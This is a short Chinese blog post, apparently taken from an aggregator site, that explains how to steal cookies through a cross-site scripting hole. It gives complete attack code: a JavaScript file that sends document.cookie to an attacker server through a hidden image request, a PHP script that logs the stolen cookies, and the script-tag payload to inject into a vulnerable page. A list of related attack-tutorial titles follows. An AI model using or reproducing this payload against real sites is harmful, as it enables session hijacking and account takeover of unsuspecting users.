XSS获取cookie

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS获取cookie相关的知识,希望对你有一定的参考价值。

在你服务器的html目录下创建joke文件夹;

在joke文件夹中创建joke.js 和joke.php

 

joke.js 创建img标签,将它的src属性指向另一个脚本joke.php,这里关键的一点是:将页面的cookie作为参数附加到url后面

joke.js代码如下:

var img = document.createElement(‘img‘);
img.width = 0;
img.height = 0;
img.src = ‘http://ip/joke/joke.php?joke=‘+encodeURIComponent(document.cookie);

 

 

joke.php解析请求里面的joke参数(即用户的cookie),然后保存起来

joke.php代码如下:

<?php
    @ini_set(‘display_errors‘,1);
    $str = $_GET[‘joke‘];
    $filePath = "joke.php";

    if(is_writable($filePath)==false){
         echo "can‘t write";
    }else{
          $handler = fopen(filePath, "a");
          fwrite($handler, $str);
          fclose($handler);
    }
?>

 

找到XSS漏洞后,输入如下内容:

<script src="http://ip/joke/joke.js"></script>

#ip为你的服务器ip

 

以上是关于XSS获取cookie的主要内容,如果未能解决你的问题,请参考以下文章

XSS平台的简单搭建和获取cookie

XSS攻击

XSS获取cookie

经验分享 | XSS手工利用方式

xss跨站大家都知道,可以截取cookies但是你们有没有见过能截取cookies还能截取后台地址以及时间的那种看图

Pikachu-xss漏洞之cookie获取钓鱼攻击和xss获取键盘记录